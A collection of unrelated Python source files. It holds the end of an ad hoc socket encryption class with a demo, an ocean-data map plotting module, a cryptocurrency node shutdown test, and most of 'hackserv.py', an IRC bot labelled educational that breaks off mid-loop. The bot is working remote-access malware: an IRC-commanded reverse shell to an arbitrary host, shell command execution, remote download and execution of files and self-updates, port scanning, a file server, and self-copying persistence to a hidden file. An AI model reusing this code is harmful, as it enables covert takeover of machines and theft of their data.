most ideal way (IMHO)
"""
def PreviousDataSalt(self):
SeedHash = sha1(self.SeedData).hexdigest()
idx = 2
v1 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 10
v2 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 2
v3 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 1
v4 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 15
v5 = ord(SeedHash[idx-2:idx].decode('hex')); idx += 3
key = self.key+str(self.Counter)
ARGS = dict()
ARGS['Key'] = sha1(''.join([str(x) for x in (v1,v2,v3)])).digest()
ARGS['Cycles'] = min(6,v1)
ARGS['BlockSz'] = max(128,v2)
ARGS['KeyAdv'] = v4
ARGS['KeyMag'] = min(int(ARGS['Cycles']/2)+1, ARGS['Cycles'])
self.Counter += 16*(v1*4)-(v3*5)
self.ReInit(ARGS)
def _Salt(self):
if self.salt_method == "Simple":
self.SimpleSalt()
elif self.salt_method == "NTP":
self.NTPSalt()
elif self.salt_method == "PrevData":
self.PreviousDataSalt()
elif self.salt_method == None:
return
else:
print "Salt Method Invalid Choose Simple, NTP, PrevData"
"""
Method to override SimpleCrypt Encrypt method so we can
make it more refined for sockets
"""
def Encrypt(self, plain):
if self.Debug:
print "\n\n",self.name," Encrypting :",plain
self.ShowInitVars("ENCRYPT")
data = array('B', plain)
for cycle in range(self.cycles):
params = ("Encrypt", cycle)
data = self.Cycle(self.SetDataVector(data, params), params)
ret = data.tostring()
if self.Debug:
print "Cipher: ",ret.encode('hex')
self.SeedData = self.MShaHex(plain)
self.HMAC = self.GenHMAC(ret)
self._Salt()
return ret
"""
override SimpleCrypt Decrypt
"""
def Decrypt(self, data):
if self.Debug:
print "\n\n",self.name," Decrypting :",self.Encode(data)
self.ShowInitVars("DECRYPT")
data = array('B', data)
for cycle in range(self.cycles):
params = ("Decrypt", cycle)
data = self.SetDataVector(self.Cycle(data, params), params)
ret = data.tostring()
if self.Debug:
print "Plain: ",ret
self.SeedData = self.MShaHex(ret)
self._Salt()
return ret
"""
method to handle receiving blocks of cipher data through
the passed in socket Object, also checks HMAC
to ensure data arrived unaltered, bad HMAC prompts
for resend up to MaxRetries
"""
def RecvData(self, socketObject):
ret = False
data = socketObject.recv(1024)
data = self.Decode(data)
dataHash = self.GenHMAC(data)
if data.find(self.BlockEndMarker) == -1 or len(data) > 2:
data = self.Decrypt(data)
else:
dataHash = self.GenHMAC(data)
socketObject.send(dataHash)
response = socketObject.recv(1024)
if response == dataHash:
ret = data
self.Errors = 0
else:
self.Errors += 1
return ret
"""
handles sending blocks of cipher data confirms receipt via HMAC &
resend if necessary
"""
def SendData(self, socketObject, data):
ret = False
dataHash = self.HMAC
socketObject.send(self.Encode(data))
response = socketObject.recv(1024)
while self.Errors <= self.MaxRetries:
if response == dataHash:
socketObject.send(dataHash)
ret = True
break
else:
print "BAD HMAC:",response," EXPECTING: ",dataHash
socketObject.send(data)
response = socketObject.recv(1024)
self.Errors += 1
continue
self.Errors = 0
print "SENT: ",dataHash," RECV: ",response
return ret
"""
Handles receiving messages and reassembles them block by block
from RecvData
"""
def DataInBound(self, socketObject):
self.InBoundData = ''
while True:
data = self.RecvData(socketObject)
if data == False:
continue
if data.find(self.BlockEndMarker) != -1:
data = data.replace(self.BlockEndMarker,"")
if len(data) > 1:
self.InBoundData += data
break
else:
self.InBoundData += data
return True
"""
Disassembles messages and sends them via SendData
"""
def DataOutBound(self, socketObject):
ret = False
for CipherBlock in self.EncryptBlock(self.OutBoundData):
self.SendData(socketObject, CipherBlock)
self.HMAC = self.GenHMAC(self.BlockEndMarker)
self.SendData(socketObject, self.BlockEndMarker)
self.OutBoundData = ''
return True
#######################################################################################
#######################################################################################
import socket, SocketServer, threading
#######################################################################################
# A Class that hold some sort of functionality we will call from the Client
class MyFunctionalClass:
def __init__(self):
self.text = "\nLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do\n"
self.text += "eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut\n"
self.text += "enim ad minim veniam, quis nostrud exercitation ullamco laboris\n"
self.text += "nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor\n"
self.text += "in reprehenderit in voluptate velit esse cillum dolore eu fugiat\n"
self.text += "nulla pariatur. Excepteur sint occaecat cupidatat non proident,\n"
self.text += "sunt in culpa qui officia deserunt mollit anim id est laborum.\n"
def Parse(self, msg):
if msg.find("Greetings") != -1:
return self.text
######################################################################################
######################################################################################
#Configuration Class subclassing SimpleSocketExt with necesssary vars we will
#need both the Server and Client will need a copy of this
class SocketCrypto(SimpleCryptSocketExt):
def __init__(self):
self.CryptoArgs = dict()
self.CryptoArgs['INITKEY'] = "My initial key"
self.CryptoArgs['DEBUG'] = False
self.CryptoArgs['CYCLES'] = 3
self.CryptoArgs['BLOCK_SZ'] = 20
self.CryptoArgs['KEY_ADV'] = 5
self.CryptoArgs['KEY_MAGNITUDE'] = 1
SimpleCryptSocketExt.__init__(self, self.CryptoArgs)
self.InBoundData = ""
self.OutBoundData = ""
#self.salt_method = "Simple"
#self.salt_method = "NTP"
#self.salt_method = "PrevData"
#####################################################################################
#####################################################################################
#Class to handle Server coms overriding BaseRequestHandler handle method
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler, SocketCrypto):
def handle(self):
self.name = str(self.__class__).split(".")[1]
SocketCrypto.__init__(self)
self.Debug = True
MyFuncClass = MyFunctionalClass()
socketObject = self.request
if self.DataInBound(socketObject):
print "SERVER RECEIVED :",self.InBoundData
self.OutBoundData = MyFuncClass.Parse(self.InBoundData)
if self.DataOutBound(socketObject):
print "\nTranfer Success!"
else:
print "\nERROR SENDING REPLY TO SENDER"
else:
print "\nERROR RECEIVING SENDER DATA"
self.ShowInitVars("SERVER")
####################################################################################
####################################################################################
#Multithreading TCP Server
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
####################################################################################
####################################################################################
####################################################################################
# Example Client Class Subclassing SocketCrypto
class MyClient(SocketCrypto):
def __init__(self, Server, Port):
SocketCrypto.__init__(self)
self.name = str(self.__class__).split(".")[1]
self.Server = Server
self.Port = Port
self.Debug = True
def CallServer(self, Messages):
ret = ""
for idx in range(0,len(Messages)):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.Server, self.Port))
if self.MessagePump(Messages[idx], sock):
print "Client Call#",idx," Received: ",self.InBoundData,"\n"
else:
print "Error Sending Message To Server"
sock.close()
SocketCrypto.__init__(self)
return ret
def MessagePump(self, Message, socketObject):
ret = False
self.OutBoundData = Message
if self.DataOutBound(socketObject):
if self.DataInBound(socketObject):
print "\nCLIENT RECV: ",self.InBoundData
ret = True
self.ShowInitVars("CLIENT")
return ret
####################################################################################
####################################################################################
if __name__ == '__main__':
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
ip, port = server.server_address
client = MyClient(ip, port)
messages = ["Greetings","Greetings","Greetings"]
client.CallServer(messages)
server.shutdown()
|
mapplot.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from cStringIO import StringIO
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
import BaseDomsHandler
import ResultsStorage
matplotlib.use('Agg')
PARAMETER_TO_FIELD = {
"sst": "sea_water_temperature",
"sss": "sea_water_salinity"
}
PARAMETER_TO_UNITS = {
"sst": "($^\circ$ C)",
"sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
if maxLat - minLat > maxLon - minLon:
a = ((maxLat - minLat) - (maxLon - minLon)) / 2.0
minLon -= a
maxLon += a
elif maxLon - minLon > maxLat - minLat:
a = ((maxLon - minLon) - (maxLat - minLat)) / 2.0
minLat -= a
maxLat += a
return minLon, maxLon, minLat, maxLat
def render(d, lats, lons, z, primary, secondary, parameter):
fig = plt.figure()
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_title(string.upper("%s vs. %s" % (primary, secondary)))
# ax.set_ylabel('Latitude')
# ax.set_xlabel('Longitude')
minLatA = np.min(lats)
maxLatA = np.max(lats)
minLonA = np.min(lons)
maxLonA = np.max(lons)
minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
# m = Basemap(projection='mill', llcrnrlon=-180,llcrnrlat=-80,urcrnrlon=180,urcrnrlat=80,resolution='l')
m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
resolution='l')
m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
m.drawcoastlines()
m.drawmapboundary(fill_color='#99ffff')
m.fillcontinents(color='#cc9966', lake_color='#99ffff')
# lats, lons = np.meshgrid(lats, lons)
masked_array = np.ma.array(z, mask=np.isnan(z))
z = masked_array
values = np.zeros(len(z))
for i in range(0, len(z)):
values[i] = ((z[i] - np.min(z)) / (np.max(z) - np.min(z)) * 20.0) + 10
x, y = m(lons, lats)
im1 = m.scatter(x, y, values)
im1.set_array(z)
cb = m.colorbar(im1)
units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
cb.set_label("Difference %s" % units)
sio = StringIO()
plt.savefig(sio, format='png')
plot = sio.getvalue()
if d is not None:
d['plot'] = plot
return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
computeOptions=None, executionId=None, plot=None):
BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
details=details, bounds=bounds, count=count,
computeOptions=computeOptions, executionId=executionId)
self.__lats = lats
self.__lons = lons
self.__z = np.array(z)
self.__parameter = parameter
self.__primary = primary
self.__secondary = secondary
self.__plot = plot
def toImage(self):
return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
manager = Manager()
d = manager.dict()
p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
p.start()
p.join()
return d['plot']
def createMapPlot(id, parameter):
with ResultsStorage.ResultsRetrieval() as storage:
params, stats, data = storage.retrieveResults(id)
primary = params["primary"]
secondary = params["matchup"][0]
lats = []
lons = []
z = []
field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
for entry in data:
for match in entry["matches"]:
if match["source"] == secondary:
if field in entry and field in match:
a = entry[field]
b = match[field]
z.append((a - b))
z.append((a - b))
else:
z.append(1.0)
z.append(1.0)
lats.append(entry["y"])
lons.append(entry["x"])
lats.append(match["y"])
lons.append(match["x"])
plot = renderAsync(lats, lons, z, primary, secondary, parameter)
r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
args=params,
details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
return r
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test emircoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
hackserv.py | #!/usr/bin/env python3
#
# HackServ IRC Bot
# hackserv.py
#
# Copyright (c) 2018-2021 Stephen Harris <trackmastersteve@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
legal_notice = 'THIS BOT IS FOR EDUCATION PURPOSES ONLY! DO NOT USE IT FOR MALICIOUS INTENT!'
author = 'Stephen Harris (trackmastersteve@gmail.com)'
github = 'https://github.com/trackmastersteve/hackserv.git'
software = 'HackServ'
version = '1.3.3'
last_modification = '2021.06.10'
# Imports
import os
import ssl
import sys
import stat
import nmap
import time
import uuid
import shlex
import shutil
import base64
import random
import socket
import datetime
import platform
import threading
import subprocess
import urllib.request
from requests import get
starttime = datetime.datetime.utcnow() # Start time is used to calculate uptime.
ip = get('https://api.ipify.org').text # Get public IP address. (used to set botnick-to-ip as well as the '.ip' command.)
sys.path.insert(0, '/usr/local/bin/') # Working directory.
from hsConfig import * # import the hsConfig.py file.
lastping = time.time() # Time at last PING.
threshold = 200 # Ping timeout before reconnect.
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set ircsock variable.
if usessl: # If SSL is True, connect using SSL.
ircsock = ssl.wrap_socket(ircsock)
ircsock.settimeout(240) # Set socket timeout.
connected = False # Variable to say if bot is connected or not.
def ircsend(msg):
ircsock.send(bytes(str(msg) +"\n", "UTF-8")) # Send data to IRC server.
def connect(): # Connect to the IRC network.
global connected
while not connected:
try: # Try and connect to the IRC server.
if debugmode: # If debugmode is True, msgs will print to screen.
print("Connecting to " + str(server) + ":" + str(port))
ircsock.connect_ex((server, port)) # Here we connect to the server.
if usesasl:
ircsend("CAP REQ :sasl") # Request SASL Authentication.
if debugmode:
print("Requesting SASL login.")
if useservpass: # If useservpass is True, send serverpass to server to connect.
ircsend("PASS "+ serverpass) # Send the server password to connect to password protected IRC server.
ircsend("USER "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick+ " "+ botnick) # We are basically filling out a form with this line and saying to set all the fields to the bot nickname.
ircsend("NICK "+ botnick) # Assign the nick to the bot.
connected = True
main()
except Exception as iconnex: # If you can't connect, wait 10 seconds and try again.
if debugmode: # If debugmode is True, msgs will print to screen.
print("Exception: " + str(iconnex))
print("Failed to connect to " + str(server) + ":" + str(port) + ". Retrying in 10 seconds...")
connected = False
time.sleep(10)
reconnect()
def reconnect(): # Reconnect to the IRC network.
global connected # Set 'connected' variable
global ircsock # Set 'ircsock' variable
while not connected:
ircsock.close() # Close previous socket.
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set ircsock variable.
if usessl: # If SSL is True, connect using SSL.
ircsock = ssl.wrap_socket(ircsock)
try:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Reconnecting to " + str(server) + ":" + str(port))
ircsock.connect_ex((server, port)) # Here we connect to the server.
if usesasl:
ircsend("CAP REQ :sasl") # Request SASL Authentication.
if debugmode:
print("Requesting SASL login.")
if useservpass: # If useservpass is True, send serverpass to server to connect.
ircsend("PASS "+ serverpass) # Send the server password to connect to password protected IRC server.
ircsend("USER "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick) # We are basically filling out a form with this line and saying to set all the fields to the bot nickname.
ircsend("NICK "+ botnick) # Assign the nick to the bot.
connected = True
main()
except Exception as irconnex: # If you can't connect, wait 10 seconds and try again.
if debugmode: # If debugmode is True, msgs will print to screen.
print("Exception: " + str(irconnex))
print("Failed to reconnect to " + str(server) + ":" + str(port) + ". Retrying in 10 seconds...")
connected = False
time.sleep(10)
reconnect()
def joinchan(chan): # Join channel(s).
ircsend("JOIN "+ chan)
ircmsg = ""
while ircmsg.find("End of /NAMES list.") == -1:
ircmsg = ircsock.recv(2048).decode("UTF-8")
ircmsg = ircmsg.strip('\n\r')
if debugmode: # If debugmode is True, msgs will print to screen.
print(ircmsg) # Print messages to the screen. (won't allow bot to run in the background.)
def partchan(chan): # Part channel(s).
ircsend("PART "+ chan)
def pjchan(chan): # Part then Join channel(s)
ircsend("PART "+ chan)
ircsend("JOIN "+ chan)
def newnick(newnick): # Change botnick.
ircsend("NICK "+ newnick)
def sendmsg(msg, target=channel): # Sends messages to the target.
ircsend("PRIVMSG "+ target +" :"+ msg)
def sendntc(ntc, target=channel): # Sends a NOTICE to the target.
ircsend("NOTICE "+ target +" :"+ ntc)
def sendversion(nick, ver): # Respond to VERSION request.
ver = "VERSION " + software + ' ' + version + ' Download it at: ' + github
sendntc(ver, nick)
def kick(msg, usr, chan): # Kick a user from the channel.
ircsend("KICK "+ chan + " " + usr + " :"+ msg)
def uptime(): # Used to get current uptime for .uptime command
delta = datetime.timedelta(seconds=round((datetime.datetime.utcnow() - starttime).total_seconds()))
return delta
def uname(): # Used to get system info for .uname command
sysinfo = platform.uname()
return sysinfo
def username(): # Used to get the OS username for .username command.
usrnm = os.getenv('USER', os.getenv('USERNAME', 'user'))
return usrnm
def guid():
uid = os.getuid()
return uid
def macaddress(): # Used to get macaddress for .macaddress command.
ma = ':'.join(hex(uuid.getnode()).strip('0x').strip('L')[i:i+2] for i in range(0,11,2)).upper()
return ma
def linuxMemory(): # Get linux system memory info for .memory command.
sendntc("Memory Info: ", adminname)
with open("/proc/meminfo", "r") as f:
lines = f.readlines()
sendntc(" " + lines[0].strip(), adminname)
sendntc(" " + lines[1].strip(), adminname)
def nmapScan(tgtHost, tgtPort): # Use nmap to scan ports on an ip address with .scan command
nmScan = nmap.PortScanner()
nmScan.scan(tgtHost, tgtPort)
state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
if state == 'open':
st = '[+]'
else:
st = '[-]'
sendmsg((st + " " + tgtHost + " tcp/" +tgtPort + " -" + state), adminname)
def rShell(rsHost, rsPort): # Open a reverse shell on this device.
try:
rs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
rs.connect_ex((str(rsHost), int(rsPort)))
rs.sendto(str.encode("[+] Connection established!"), (str(rsHost), int(rsPort)))
rsConnected = True
if debugmode: # If debugmode is True, msgs will print to screen.
print("[+] Connection established with " + rsHost + ":" + rsPort + "!")
while rsConnected:
try:
data = rs.recv(1024).decode("UTF-8")
if data == "quit" or "exit":
rs.close()
sendntc("[x] Closed reverse shell connection with "+ rsHost +":"+ rsPort +"!", adminname)
if debugmode:
print("[x] Closed reverse shell connection with "+ rsHost +":"+ rsPort +"!")
if data[:2] == "cd":
os.chdir(data[3:])
if len(data) > 0:
sproc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = sproc.stdout.read() + sproc.stderr.read()
output_str = str(stdout_value, "UTF-8")
currentWD = os.getcwd() + "> "
rs.sendto(str.encode(currentWD + output_str), (str(rsHost), int(rsPort)))
except Exception as rsex:
if debugmode:
print("rShell Exception: " + str(rsex))
rsConnected = False
except Exception as rsconnex:
if debugmode: # If debugmode is True, msgs will print to screen.
print("rShell Socket Connection Exception: " + str(rsconnex))
rs.close()
def runcmd(sc): # Run shell commands on this device.
proc = subprocess.Popen(shlex.split(sc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
line = proc.stdout.readline()
line_str = str(line, "UTF-8")
if line == b'' and proc.poll() is not None:
if debugmode: # If debugmode is True, msgs will print to screen.
print("End of .cmd output.")
sendntc("Shell>", adminname)
return
if line:
if debugmode: # If debugmode is True, msgs will print to screen.
print(format(line_str))
sendntc("Shell> " + format(line_str), adminname)
pp = proc.poll()
if debugmode: # If debugmode is True, msgs will print to screen.
print(pp)
sendntc(pp, adminname)
sendntc("Shell> Done.", adminname)
def runcmd_noout(sc): # Run shell commands with any feedback output.
proc = subprocess.Popen(sc, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
def setmode(flag, target=channel): # Sets given mode to nick or channel.
ircsend("MODE "+ target +" "+ flag)
def download(link, file): # Download a file.
urllib.request.urlretrieve(str(link), str(file))
sendntc(str(file) +" was successfully downloaded from "+ str(link) +"!", adminname)
def execute(xType, file): # Run executable file.
if xType == 'ex':
exec(open(str(file)).read())
if type == 'sys':
os.system(str(file))
else:
runcmd_noout('./'+ file)
def chFileMod(modFile, modType): # Change the file permissions. (chmod)
os.chmod(str(modFile), modType)
sendntc(str(modFile) +" mode was changed to: "+ str(modType) +"!", adminname)
def update(link, dlFile): # Update bot.
if debugmode: # If debugmode is True, msgs will print to screen.
print("[==>] Downloading update file: "+ str(dlFile))
download(link, dlFile) # Download the updated file.
if debugmode: # If debugmode is True, msgs will print to screen.
print("[chmod +x] Making "+ str(dlFile) +" executable!")
chFileMod(dlFile, 0o755) # Make the file executable.
if debugmode: # If debugmode is True, msgs will print to screen.
print("[<==] Backing up old hackserv.py and renaming "+ str(dlFile) +" to hackserv.py")
os.rename("hackserv.py", "hackserv.py.bak") # Backup the original 'hackserv.py' file.
os.rename(str(dlFile), "hackserv.py") # Rename the new file to 'hackserv.py'
if debugmode: # If debugmode is True, msgs will print to screen.
print("[+] Restarting hackserv.py!")
os.execv(__file__, sys.argv) # Exit the old process and start the new one.
sendntc("[*] Success! "+ str(dlFile) +" was renamed and old 'hackserv.py' was successsfully backed up and updated!", adminname)
def retrieveFile(fsname, fs, fsaddr): # Receive a file.
filename = fs.recv(1024).decode("UTF-8")
if os.path.isfile(filename):
fs.sendto(str.encode("EXISTS " + str(os.path.getsize(filename))), fsaddr)
userResponse = fs.recv(1024).decode("UTF-8")
if userResponse[:2] == 'OK':
with open(filename, 'rb') as f:
bytesToSend = f.read(1024)
fs.sendto(bytesToSend, fsaddr)
while bytesToSend != "":
bytesToSend = f.read(1024)
fs.sendto(bytesToSend, fsaddr)
else:
fs.sendto(str.encode("ERR"), fsaddr)
fs.close()
def fileServer(): # Open a file server on this device.
host = '127.0.0.1'
port = 4444
s = socket.socket()
s.bind((host, port))
s.listen(5)
if debugmode: # If debugmode is True, msgs will print to screen.
print("[*] File Server (Download) started!")
sendntc("[*] File Server (Download) started!", adminname)
while True:
c, addr = s.accept()
if debugmode: # If debugmode is True, msgs will print to screen.
print("[+] Client connected ip: " + str(addr))
sendntc("[+] Client connected ip: " + str(addr), adminname)
t = threading.Thread(target=retrieveFile, args=("retreiveThread", c, addr))
t.start()
s.close()
def fileList(dir): # List files in current directory
os.chdir(dir)
for root, dirs, files in os.walk(dir, topdown = False): # walk through current directory.
for name in files:
if debugmode: # If debugmode is True, msgs will print to screen.
print(os.path.join(root, name)) # Print the file list to screen if debugmode is enabled.
sendntc(os.path.join(root, name), adminname)
time.sleep(1)
for name in dirs:
if debugmode: # If debugmode is True, msgs will print to screen.
print(os.path.join(root, name)) # Print the dir list to screen if debugmode is enabled.
sendntc(os.path.join(root, name), adminname)
time.sleep(1)
def bgMining():
# Mine crypto in the background.
if debugmode:
print("bgMining started!")
sendntc("This does nothing, yet!", name)
def nonExist(command, name):
errorMessage = str(command) +" does not exist yet. Please go to "+ github +" if you feel like you can contribute."
if debugmode:
print(errorMessage)
sendntc(errorMessage, name)
def persistence():
# Startup Check. (Still in testing!)
name = str(__name__) # Get filename.
hd = str(os.path.expanduser('~')) # Get path to home directory.
hdPath = str(os.getcwd()) # Get current working directory.
clone = hdPath + '/.hackserv.py' # Set clone name as .hackserv.py in current working directory.
if name == clone:
if debugmode: # If debugmode is True, msgs will print to screen.
print(name + " and "+ clone + " are the same file!")
connect()
else:
try:
if debugmode: # If debugmode is True, msgs will print to screen.
print("NAME: " + name) # Current filename.
print("CLONE: " + clone) # Cloned filename.
print("HOME DIR: " + hd) # Home directory location.
#if os.path.isdir(hdPath) and os.path.exists(hdPath):
#if debugmode: # If debugmode is True, msgs will print to screen.
#print("Directory Exists: " + hdPath)
#else:
#if debugmode: # If debugmode is True, msgs will print to screen.
#print("Creating Directory: " + hdPath)
#os.mkdir(hdPath)#, 0700)
if os.path.isfile(clone):
if debugmode: # If debugmode is True, msgs will print to screen.
print("Bot File Exists: " + clone)
# need to run clone instead
else:
if name != clone:
# Need to check root permissions to copy to /usr/local/bin/.
if os.getuid() == 'root':
shutil.copyfile(name, '/usr/local/bin/')
else:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Copying " + name + " to: " + clone)
shutil.copyfile(name, clone)
if debugmode: # If debugmode is True, msgs will print to screen.
print("Running: " + clone)
runcmd(clone)
#os.system(clone)
except OSError as mdr:
if debugmode: # If debugmode is True, msgs will print to screen.
print("ERROR: " + str(mdr))
def main(): # This is the main function for all of the bot controls.
global connected
global botnick
global ip
global lastping
while connected:
ircmsg = ircsock.recv(2048).decode("UTF-8")
ircmsg = ircmsg.strip('\n\r')
if debugmode: # If debugmode is True, msgs will print to screen.
print(ircmsg) # Print messages to the screen. (won't allow bot to run in the background.)
# SASL Authentication.
if ircmsg.find("ACK :sasl") != -1:
if usesasl:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Authenticating with SASL PLAIN.") # Request PLAIN Auth.
ircsend("AUTHENTICATE PLAIN")
if ircmsg.find("AUTHENTICATE +") != -1:
if usesasl:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Sending %s Password: %s to SASL." % (nickserv, nspass))
authpass = botnick + '\x00' + botnick + '\x00' + nspass
ap_encoded = str(base64.b64encode(authpass.encode("UTF-8")), "UTF-8")
ircsend("AUTHENTICATE " + ap_encoded) # Authenticate with SASL.
if ircmsg.find("SASL authentication successful") != -1:
if usesasl:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Sending CAP END command.")
ircsend("CAP END") # End the SASL Authentication.
# Wait 30 seconds and try to reconnect if 'too many connections from this IP'
if ircmsg.find('Too many connections from your IP') != -1:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Too many connections from this IP! Reconnecting in 30 seconds...")
connected = False
time.sleep(30)
reconnect()
# Change nickname if current nickname is already in use.
if ircmsg.find('Nickname is already in use') != -1:
botnick = "hs[" + str(random.randint(10000,99999)) +"]"
newnick(botnick)
# Join 'channel' and msg 'admin' after you are fully connected to server.
if ircmsg.find('NOTICE') != -1:
name = ircmsg.split('!',1)[0][1:]
message = ircmsg.split('NOTICE',1)[1].split(':',1)[1]
if message.find('*** You are connected') != -1:
#sendmsg("IDENTIFY %s" % nspass, nickserv)
joinchan(channel)
sendntc(format(ip) + " Online!", adminname)
# Respond to 'PONG ERROR' message from server.
if message.find('ERROR') != -1:
if debugmode: # If debugmode is True, msgs will print to screen.
print("Received a 'ERROR' from the server, reconnecting in 5 seconds...")
connected = False
time.sleep(5)
reconnect()
# Respond to NickServ ident request.
if name.lower() == nickserv.lower() and message.find('This nickname is registered') != -1:
sendmsg("IDENTIFY " + nspass, nickserv)
# Respond to CTCP VERSION.
if ircmsg.find('VERSION') != -1:
name = ircmsg.split('!',1)[0][1:]
vers = version
sendversion(name, vers)
# Things to do when a user joins the channel.
if ircmsg.find('JOIN') != -1:
name = ircmsg.split('!',1)[0][1:] # Username
message = ircmsg.split('JOIN',1)[1].split(':',1)[1] # Channel
ipHost = ircmsg.split('JOIN',1)[0] #IP Address or Hostname
if len(name) < 17:
if message.find(channel) != -1:
if onJoin: # must have 0nJoin = True in hsConfig.
#ircsend("DNS "+ name) # Attempt to get users IP address using DNS from IRC Server. (Commented out due to Oper requirements on most servers.)
sendntc('User: '+ name +' Hostname: '+ ipHost +' Joined: '+ message, adminname)
# Messages come in from IRC in the format of: ":[Nick]!~[hostname]@[IPAddress]PRIVMSG[channel]:[message]"
if ircmsg.find('PRIVMSG') != -1:
name = ircmsg.split('!',1)[0][1:]
message = ircmsg.split('PRIVMSG',1)[1].split(':',1)[1]
# IRC Nicks are normally less than 17 characters long.
if len(name) < 17:
# Respond to anyone saying 'Hi [botnick]'.
if message.find('Hi ' + botnick) != -1:
sendntc("Hello " + name + "!", name)
# Respond to '.msg [target] [message]' command from admin.
